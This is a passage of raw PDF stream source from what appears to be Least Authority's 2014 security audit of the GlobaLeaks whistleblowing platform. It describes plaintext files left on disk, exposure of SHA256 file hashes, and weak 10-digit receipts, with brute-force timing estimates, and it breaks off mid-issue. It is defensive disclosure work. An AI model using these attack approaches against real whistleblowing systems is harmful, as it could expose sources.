Tj T* ET Q Q q 1 0 0 1 62.69291 627.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue Format) Tj T* ET Q Q q 1 0 0 1 62.69291 609.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (All ) Tj /F4 10 Tf (Issues ) Tj /F1 10 Tf (represent ) Tj /F4 10 Tf (potential ) Tj /F1 10 Tf (security vulnerabilities and have these fields:) Tj T* ET Q Q q 1 0 0 1 62.69291 591.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (The date when ) Tj /F4 10 Tf (Least Authority ) Tj /F1 10 Tf (first notified the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (team about the finding.) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm q BT 1 0 0 1 0 14 Tm 2.970751 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (A concise description of the ) Tj /F4 10 Tf (essential ) Tj /F1 10 Tf (vulnerability. Note, we explicitly strive to exclude) Tj T* 0 Tw (conflating issues, such as when other components or aspects of the system may mitigate the vulnerability.) Tj T* ET Q Q q 1 0 0 1 62.69291 507.0236 cm q BT 1 0 0 1 0 38 Tm .188735 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (We describe what benefit an attacker gains from leveraging the attack. Note, we attempt to make) Tj T* 0 Tw .988651 Tw (this assertion conservatively, and this does not include a "real life impact analysis" such as determining) Tj T* 0 Tw 1.37332 Tw (how many existing users could be compromised by a live attack. For example, the impact of a flaw in) Tj T* 0 Tw (authentication may be that an attacker may authenticate as any user within a class of users.) Tj T* ET Q Q q 1 0 0 1 62.69291 453.0236 cm q BT 1 0 0 1 0 38 Tm 1.44784 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (Here we describe what resources are necessary to execute the attack, which can) Tj T* 0 Tw 1.456647 Tw (help reason about mitigation priorities. 
For example, an authentication vulnerability may require finding) Tj T* 0 Tw .49061 Tw /F3 10 Tf (MD5 ) Tj /F1 10 Tf (collisions in passwords, or it may require only a ) Tj /F4 10 Tf (Cross-Site Request Forgery) Tj /F1 10 Tf (, and these two cases) Tj T* 0 Tw (involve qualitatively different attacker resources.) Tj T* ET Q Q q 1 0 0 1 62.69291 399.0236 cm q BT 1 0 0 1 0 38 Tm .830514 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The feasibility of an attack is a ) Tj /F4 10 Tf (tentative ) Tj /F1 10 Tf (educated guess as to how difficult it may be for an) Tj T* 0 Tw 1.92284 Tw (attacker to acquire the necessary attack resources above. For example, we would assume an attack) Tj T* 0 Tw 2.910697 Tw (which relies on ) Tj /F3 10 Tf (MD5 ) Tj /F1 10 Tf (collisions is qualitatively more expensive and less feasible than a ) Tj /F4 10 Tf (Cross-Site) Tj T* 0 Tw (Request Forgery) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 357.0236 cm q BT 1 0 0 1 0 26 Tm .891412 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Here we describe our method of verifying the vulnerability, and also demonstrations of the) Tj T* 0 Tw 1.286412 Tw (vulnerability, such as code snippets or screenshots. If an ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (is judged unexploitable, the verification) Tj T* 0 Tw (section becomes especially important, because mistakes in verification may mask exploitability.) Tj T* ET Q Q q 1 0 0 1 62.69291 327.0236 cm q BT 1 0 0 1 0 14 Tm 3.12498 Tw 12 TL /F2 10 Tf 0 0 0 rg (Vulnerability Description: ) Tj /F1 10 Tf (In this section we describe the implementation details and the specific) Tj T* 0 Tw (process necessary to perform an attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 285.0236 cm q BT 1 0 0 1 0 26 Tm .020697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (The mitigation section focuses on what steps ) Tj /F4 10 Tf (current ) Tj /F1 10 Tf (users or operators may take immediately) Tj T* 0 Tw 2.778443 Tw (to protect themselves. 
It's important that the developers, users, and operators cautiously verify our) Tj T* 0 Tw (recommendations before implementing them.) Tj T* ET Q Q q 1 0 0 1 62.69291 231.0236 cm q BT 1 0 0 1 0 38 Tm 1.917976 Tw 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (The remediation recommendations recommend a development path which will prevent,) Tj T* 0 Tw 3.78229 Tw (detect, or otherwise mitigate the vulnerability in future releases. There may be multiple possible) Tj T* 0 Tw 1.046905 Tw (remediation strategies, so we try to make minimal recommendations and collaborate with developers to) Tj T* 0 Tw (arrive at the most pragmatic remediation.) Tj T* ET Q Q q 1 0 0 1 62.69291 201.0236 cm q BT 1 0 0 1 0 14 Tm .274198 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (This field has a one sentence description of the state of an ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (at the time of report publication.) Tj T* 0 Tw (This is followed by a chronological log of refinements to the ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (entry which occurred during the audit.) Tj T* ET Q Q q 1 0 0 1 62.69291 201.0236 cm Q endstream endobj % 'R351': class PDFStream 351 0 obj % page stream << /Length 4986 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue A. Plaintext is Written to Disk Before Encryption) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q BT 1 0 0 1 0 14 Tm .915697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The files whistleblowers submit are written to disk before being encrypted with the receiver's) Tj T* 0 Tw (public key.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 684.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (Forensic analysis of the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's hard drive could reveal the contents of past leaks.) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs block-level access to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's disk.) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm q BT 1 0 0 1 0 26 Tm 1.221984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (To gain block-level access to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's disk, they would have to either have) Tj T* 0 Tw .074987 Tw (root access to the server, or physical access to the hard drive. Once they have this access, recovering the) Tj T* 0 Tw (plaintext files is trivial.) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q BT 1 0 0 1 0 26 Tm .778735 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection and by checking the contents of the files written to disk) Tj T* 0 Tw 1.584104 Tw (after submitting them to a receiver with a ) Tj /F4 10 Tf (PGP ) Tj /F1 10 Tf (key configured. The steps followed to verify this issue) Tj T* 0 Tw (were:) Tj T* ET Q Q q 1 0 0 1 62.69291 576.0236 cm Q q 1 0 0 1 62.69291 576.0236 cm Q q 1 0 0 1 62.69291 564.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Submit a Tip with a file to a receiver with a PGP key configured.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 558.0236 cm Q q 1 0 0 1 62.69291 534.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .169213 Tw 12 TL /F1 10 Tf 0 0 0 rg (Look in ) Tj /F3 10 Tf (/var/globaleaks/files/submission/ ) Tj /F1 10 Tf (and see that the file has been written to disk in) Tj T* 0 Tw (plaintext.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 528.0236 cm Q q 1 0 0 1 62.69291 504.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .76561 Tw (Complete the Tip submission, and see that the plaintext file was removed and replaced with a new) Tj T* 0 Tw (ciphertext file.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 504.0236 cm Q q 1 0 0 1 62.69291 486.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (See the screenshot below:) Tj T* ET Q Q q 1 0 0 1 96.9978 237.1436 cm q 401.28 0 0 242.88 0 0 cm /FormXob.3504796935e9b1b0d34a034172872e63 Do Q Q q 1 0 0 1 62.69291 219.1436 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 177.1436 cm q BT 1 0 0 1 0 26 Tm .739984 Tw 12 TL /F1 10 Tf 0 0 0 rg (In the default ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (configuration, the whistleblower's files are written to disk, in plaintext, as soon) Tj T* 0 Tw .48881 Tw (as they are uploaded. Once the Tip has been submitted, the files are encrypted with the receiver's public) Tj T* 0 Tw (key, and the temporary plaintext files are unlinked from the filesystem.) Tj T* ET Q Q q 1 0 0 1 62.69291 147.1436 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.12528 Tw (Unlinking the files from the filesystem does not destroy the data, it only removes the references to that) Tj T* 0 Tw (data. The content of the files will continue to exist on disk until it is overwritten by other files.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 105.1436 cm q BT 1 0 0 1 0 26 Tm 2.401976 Tw 12 TL /F1 10 Tf 0 0 0 rg (The code for encrypting files is in ) Tj /F3 10 Tf (globaleaks/jobs/delivery_sched.py) Tj /F1 10 Tf (. More specifically, the) Tj T* 0 Tw .32784 Tw /F3 10 Tf (fsops_gpg_encrypt\(\) ) Tj /F1 10 Tf (function. This function takes a ) Tj /F4 10 Tf (path ) Tj /F1 10 Tf (to the plaintext file, which has already been) Tj T* 0 Tw (written to disk.) Tj T* ET Q Q q 1 0 0 1 62.69291 87.14362 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q endstream endobj % 'R352': class PDFStream 352 0 obj % page stream << /Length 2863 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The version of ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (we audited does not provide any settings to make mitigating this issue easy.) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 26 Tm .37686 Tw 12 TL /F1 10 Tf 0 0 0 rg (As a short-term mitigation, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should use a tool like ) Tj /F3 10 Tf (srm ) Tj /F1 10 Tf (to wipe the disk's) Tj T* 0 Tw .269988 Tw (free space. This is not a reliable mitigation, since ) Tj /F3 10 Tf (srm ) Tj /F1 10 Tf (is not guaranteed to erase ) Tj /F4 10 Tf (all ) Tj /F1 10 Tf (free space, and may) Tj T* 0 Tw (leave portions of the unlinked plaintext files intact.) Tj T* ET Q Q q 1 0 0 1 62.69291 693.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 663.0236 cm q BT 1 0 0 1 0 14 Tm .962927 Tw 12 TL /F1 10 Tf 0 0 0 rg (Once something has been written to non-volatile storage like a hard disk, it is extremely difficult to later) Tj T* 0 Tw (guarantee that it is erased. ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (should never write a plaintext file to non-volatile storage.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 621.0236 cm q BT 1 0 0 1 0 26 Tm .812485 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (should encrypt files with an ephemeral key as they are uploaded, before they are written to) Tj T* 0 Tw 2.981318 Tw (disk. The ephemeral key should stay in volatile memory until the files are encrypted with the) Tj T* 0 Tw (receiver's ) Tj /F4 10 Tf (PGP ) Tj /F1 10 Tf (key. Then the ephemeral key can be securely erased from memory.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.608651 Tw (Another possible remediation is to encrypt files in JavaScript before they are uploaded \(i.e. do the) Tj T* 0 Tw .65284 Tw (ephemeral key encryption in JavaScript\). PGP encryption in JavaScript is not feasible because the client) Tj T* 0 Tw 1.573984 Tw (would have to re-encrypt and re-upload the file for each receiver \(otherwise receivers could tell which) Tj T* 0 Tw (other receivers got the file\).) Tj T* ET Q Q q 1 0 0 1 62.69291 537.0236 cm q BT 1 0 0 1 0 14 Tm .721984 Tw 12 TL /F1 10 Tf 0 0 0 rg (According to email from the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers, a similar remediation for this issue is already being) Tj T* 0 Tw (developed. We will work with the developers to ensure their solution is sound.) Tj T* ET Q Q q 1 0 0 1 62.69291 519.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks ticket 672) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 519.0236 cm Q endstream endobj % 'R353': class PDFStream 353 0 obj % page stream << /Length 4624 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue B. 
SHA256 of Plaintext File is Saved when Encryption is Enabled) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q BT 1 0 0 1 0 14 Tm 2.835697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The SHA256 hashes of the files whistleblowers submit are saved and displayed to the) Tj T* 0 Tw (whistleblower and receivers, even when the receiver has a public key configured.) Tj T* ET Q Q q 1 0 0 1 62.69291 648.0236 cm q BT 1 0 0 1 0 38 Tm 1.249431 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An adversary who can log in as the whistleblower or the receiver, or who gains access to the) Tj T* 0 Tw .923984 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's database, can check guesses about the file that was submitted. For example, if the) Tj T* 0 Tw 1.189986 Tw (adversary has a list of 1000 files they suspect were submitted, they can compare the SHA256 hash of) Tj T* 0 Tw (each to find which ones \(if any\) were submitted.) Tj T* ET Q Q q 1 0 0 1 62.69291 606.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .553876 Tw (If the adversary knows only most of the file's contents, they can use the SHA256 hash to check guesses) Tj T* 0 Tw .165542 Tw (about the unknown part. For example, if they know the file contains a phone number, they can try hashing) Tj T* 0 Tw (variants of the file with every possible phone number.) Tj T* ET Q Q q 1 0 0 1 62.69291 552.0236 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .975777 Tw (Even if the adversary cannot guess or brute-force the contents of the file, they can still use the hash to) Tj T* 0 Tw .224651 Tw (rule out certain possibilities. 
For example, if the file contains the whistleblower's credit card number, trying) Tj T* 0 Tw .472339 Tw (all possible credit card numbers would be infeasible, but many credit card numbers could be ruled out by) Tj T* 0 Tw (showing that the hash doesn't match, thus decreasing the real whistleblower's anonymity-set size.) Tj T* ET Q Q q 1 0 0 1 62.69291 510.0236 cm q BT 1 0 0 1 0 26 Tm .261098 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs access to log in as the whistleblower or the receiver of the file, or) Tj T* 0 Tw 1.227045 Tw (access to the Node's database. The attacker may also be able to recover the hash from the receiver's) Tj T* 0 Tw (browser's ) Tj /F3 10 Tf (Etag ) Tj /F1 10 Tf (cache.) Tj T* ET Q Q q 1 0 0 1 62.69291 444.0236 cm q BT 1 0 0 1 0 50 Tm .645318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The feasibility of this attack depends on the specific scenario, and on how much information) Tj T* 0 Tw 2.166235 Tw (the attacker already has about the files that were uploaded. If the whistleblower submitted one of a) Tj T* 0 Tw 2.937126 Tw (company's official documents without modifying it at all, finding the document given access to the) Tj T* 0 Tw .153735 Tw (document set and the hash is trivial. If the whistleblower submitted files containing random strings that the) Tj T* 0 Tw (attacker cannot guess, then the adversary can only rule out guesses.) Tj T* ET Q Q q 1 0 0 1 62.69291 414.0236 cm q BT 1 0 0 1 0 14 Tm 3.525366 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by using the software as the whistleblower and receiver. See the following) Tj T* 0 Tw (screenshot.) 
Tj T* ET Q Q q 1 0 0 1 112.2378 163.9436 cm q 370.8 0 0 244.08 0 0 cm /FormXob.12d7112d5b2b1261984a9bb3e1aa38ff Do Q Q q 1 0 0 1 62.69291 145.9436 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 115.9436 cm q BT 1 0 0 1 0 14 Tm 1.744692 Tw 12 TL /F1 10 Tf 0 0 0 rg (When a whistleblower uploads a file, it is hashed with SHA256 and the hash saved to the database,) Tj T* 0 Tw (before the file's encryption. This happens in ) Tj /F3 10 Tf (dump_file_fs\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 85.94362 cm q BT 1 0 0 1 0 14 Tm 2.276647 Tw 12 TL /F1 10 Tf 0 0 0 rg (Further, in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (, the ) Tj /F3 10 Tf (Etag ) Tj /F1 10 Tf (header is set to the SHA256 hash. This ) Tj T* 0 Tw 1.112093 Tw (increases the risk of it being leaked, since the user's web browser may write this value to disk and not) Tj T* 0 Tw ET Q Q endstream endobj % 'R354': class PDFStream 354 0 obj % page stream << /Length 4236 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 26 Tm .592485 Tw 12 TL /F1 10 Tf 0 0 0 rg (delete it properly. This also makes it possible for forensic investigators to confirm that the user's browser) Tj T* 0 Tw .845542 Tw (downloaded the file. When testing with the ) Tj /F4 10 Tf (Tor Browser Bundle) Tj /F1 10 Tf (, the ) Tj /F4 10 Tf (Etag ) Tj /F1 10 Tf (is not sent back to the server,) Tj T* 0 Tw (and we are unsure if it is being stored in the browser's cache.) 
Tj T* ET Q Q q 1 0 0 1 115.7178 471.0236 cm q 363.84 0 0 252 0 0 cm /FormXob.50a88798ae89ee7ab040ed56b8555632 Do Q Q q 1 0 0 1 62.69291 453.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 423.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.044147 Tw (Whistleblowers can mitigate this issue by including cryptographically-secure random strings in their files) Tj T* 0 Tw (before uploading them, taking care that these strings and modified files not be saved or shared elsewhere.) Tj T* ET Q Q q 1 0 0 1 62.69291 405.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 375.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .82881 Tw (To fix this issue, the SHA256 hash feature should be removed. The Etag header should take a different) Tj T* 0 Tw (value, perhaps the hash of the ciphertext after GPG-encryption.) Tj T* ET Q Q q 1 0 0 1 62.69291 333.0236 cm q BT 1 0 0 1 0 26 Tm .53284 Tw 12 TL /F1 10 Tf 0 0 0 rg (According to the ) Tj 0 0 .501961 rg (GlobaLeaks Application Security Design and Details ) Tj 0 0 0 rg (document, this feature is meant for) Tj T* 0 Tw 2.258651 Tw (receivers to look the file up in virus databases. That's probably not useful, and actually encourages) Tj T* 0 Tw (receivers to leak info about the files, since they will probably use a third-party online service.) Tj T* ET Q Q q 1 0 0 1 62.69291 303.0236 cm q BT 1 0 0 1 0 14 Tm 4.869984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Another use case is for a whistleblower to verify that their file uploaded successfully; but a) Tj T* 0 Tw (man-in-the-middle that could modify the file could also modify the alleged hash.) Tj T* ET Q Q q 1 0 0 1 62.69291 285.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 279.0236 cm Q q 1 0 0 1 62.69291 279.0236 cm Q q 1 0 0 1 62.69291 255.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .983828 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-01-31 ) Tj /F1 10 Tf (- The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (team suggested this issue was related to ) Tj 0 0 .501961 rg (GlobaLeaks ticket) Tj T* 0 Tw (782) Tj 0 0 0 rg (, as well as the ) Tj 0 0 .501961 rg (GlobaLeaks Submission Flood Resiliency Project) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 249.0236 cm Q q 1 0 0 1 62.69291 213.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .039983 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-02-06 ) Tj /F1 10 Tf (- ) Tj /F4 10 Tf (Least Authority ) Tj /F1 10 Tf (determined this issue is unrelated to flooding attacks, so neither) Tj T* 0 Tw 1.570888 Tw 0 0 .501961 rg (GlobaLeaks ticket 782 ) Tj 0 0 0 rg (nor ) Tj 0 0 .501961 rg (GlobaLeaks Submission Flood Resiliency Project ) Tj 0 0 0 rg (are directly relevant.) Tj T* 0 Tw (This suggests this Issue description needs improvement.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 207.0236 cm Q q 1 0 0 1 62.69291 195.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #822) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 195.0236 cm Q q 1 0 0 1 62.69291 195.0236 cm Q endstream endobj % 'R355': class PDFStream 355 0 obj % page stream << /Length 7445 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue C. 
Receipts are Vulnerable to Guessing) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET Q Q q 1 0 0 1 62.69291 690.0236 cm q BT 1 0 0 1 0 26 Tm 1.643828 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The receipts generated by ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (to let whistleblowers view tips they have submitted) Tj T* 0 Tw 1.92311 Tw (consist of 10 random digits in the default configuration. This is not enough entropy to prevent offline) Tj T* 0 Tw (guessing, nor to prevent online guessing without contingent mitigations.) Tj T* ET Q Q q 1 0 0 1 62.69291 660.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .25686 Tw (The default receipt size and format is an explicit design choice intended to balance usability and plausible) Tj T* 0 Tw (deniability against brute-force guessing resistance.) Tj T* ET Q Q q 1 0 0 1 62.69291 642.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (By guessing a receipt, an attacker can authenticate as that tip's whistleblower to the Node.) Tj T* ET Q Q q 1 0 0 1 62.69291 600.0236 cm q BT 1 0 0 1 0 26 Tm .497318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (Given access to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (web site, an attacker can attempt to guess receipts) Tj T* 0 Tw .616098 Tw (by trying all 10^10 possibilities. To perform an online attack, the attacker needs to be able to send many) Tj T* 0 Tw (requests to the web server.) Tj T* ET Q Q q 1 0 0 1 62.69291 558.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .422927 Tw (To perform an offline attack, the attacker needs access to the receipt hashes and the Node's receipt salt.) Tj T* 0 Tw 2.757485 Tw (Given a receipt hash from the GlobaLeaks Node, an attacker can find the associated receipt in a) Tj T* 0 Tw (reasonable amount of time, by trying all 10^10 possibilities.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 540.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Feasibility:) Tj T* ET Q Q q 1 0 0 1 62.69291 522.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Assuming a rate of 1000 guesses per second, which is reasonable for an online attack:) Tj T* ET Q Q q 1 0 0 1 62.69291 516.0236 cm Q q 1 0 0 1 62.69291 516.0236 cm Q q 1 0 0 1 62.69291 492.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.38528 Tw (If there are 1000 existing receipts, the attacker should find one of them in about 1.4 hours of) Tj T* 0 Tw (guessing on average.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 486.0236 cm Q q 1 0 0 1 62.69291 462.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .33832 Tw (If there are 100 existing receipts, the attacker should find one of them in about 19 hours of guessing) Tj T* 0 Tw (on average.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 456.0236 cm Q q 1 0 0 1 62.69291 432.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 